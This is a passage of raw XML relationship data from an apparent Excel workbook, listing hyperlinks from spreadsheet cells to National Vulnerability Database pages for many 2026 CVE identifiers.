Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92582" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92601" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92602" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92753" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92772" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92773" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92804" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68904" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73435" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73438" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73446" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73450" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73459" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73460" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77407" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81564" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85628" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87088" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91097" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61560" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId825" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20130" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20192" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76423" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20234" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20307" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20322" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20324" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20325" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20329" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20330" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20332" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87719" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20242" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20326" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12944" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20331" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90937" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20176" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20194" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20211" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20237" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20284" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20305" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20306" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20341" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53713" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75513" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76420" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20333" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20336" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20340" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20344" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20360" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20361" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76409" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84860" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92122" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92123" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92124" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92125" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92137" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92466" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92762" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82028" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20135" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20154" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20249" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20250" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20295" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20352" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54628" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56100" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76412" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79708" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20334" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20323" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88033" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76413" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78252" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20335" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74909" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85469" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92127" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92134" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92135" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92136" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" 